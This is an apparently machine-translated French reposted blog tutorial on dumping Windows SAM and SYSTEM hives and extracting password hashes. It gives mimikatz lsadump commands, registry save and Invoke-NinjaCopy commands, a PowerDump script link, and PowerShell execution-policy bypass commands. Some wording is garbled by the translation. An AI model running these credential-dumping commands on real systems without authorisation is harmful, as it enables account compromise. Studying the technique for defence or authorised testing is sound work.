Acquisition et décryptage de fichiers SAM

Others 2020-09-25 19:30:58 views: null

Préface

emplacement du fichier ntds.dit: emplacement du fichier C:\Windows\NTDS\NTDS.dit
système : emplacement du fichier C:\Windows\System32\config\SYSTEM
sam: C:\Windows\System32\config\SAM
#Méthode d'obtention du hachage utilisateur via la base de données SAM

Lecture à distance

mimikatz lit la base de données SAM en ligne

privilège :: debug
token ::
elevate lsadump :: sam

Insérez la description de l'image ici

PowerShell

À l'aide d'un script PowerShell dans empire, téléchargez l'adresse:
https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-PowerDump.ps1
Insérez la description de l'image ici
De gauche à droite se trouve le nom d'utilisateur, Rid, ntlm , Lm.
Un débarrassé de 500 représente un administrateur, 504 représente un compte invité, etc. La différence entre lm et ntlm réside dans la méthode de chiffrement. Vous pouvez lire ce blog pour plus de détails .

Craquage hors ligne

Comment télécharger les fichiers système et sam

Utiliser le registre (nécessite des autorisations d'administrateur)

Obtenez le fichier de base de données SAM du système actuel et lisez-le sous un autre système. L'extraction du hachage du mot de passe utilisateur local du système cible à partir de SAM nécessite des privilèges d'administrateur.

reg save HKLM \ SYSTEM system.hiv
reg save HKLM \ SAM sam.hiv

Insérez la description de l'image ici

Obtenez sam et système via NinjaCopy

Adresse de téléchargement de ninjacopy: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-NinjaCopy.ps1

Import-Module -name .\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SYSTEM" -LocalDestination "c:\system.hiv"
Invoke-NinjaCopy -Path "C:\Windows\System32\config\SAM" -LocalDestination "c:\sam.hiv"

Annexe: Commandes pour contourner la stratégie d'exécution
PowerShell : cmd: powershell -ep bypass
powershell: Set-ExecutionPolicy Bypass -Scope Process

Vous pouvez également vous référer au lien suivant pour
contourner la stratégie d'exécution PowerShell

Décrypter les données du fichier SAM

En utilisant mimikatz, le paramètre est le chemin du système et des fichiers sam que vous venez de télécharger:
lsadump::sam /sam:sam.hiv /system:system.hiv
Insérez la description de l'image ici

Insérez la description de l'image ici

Je suppose que tu aimes

Origine blog.csdn.net/qq_41874930/article/details/108149449
conseillé
Classement
du quotidien
Plus
2024-06-10(0)
2024-06-09(0)
2024-06-08(0)
2024-06-07(0)
2024-06-06(0)
2024-06-05(0)
2024-06-04(2)
2024-06-03(0)
2024-06-02(1)
2024-06-01(0)

Code World

© 2018 codetd.com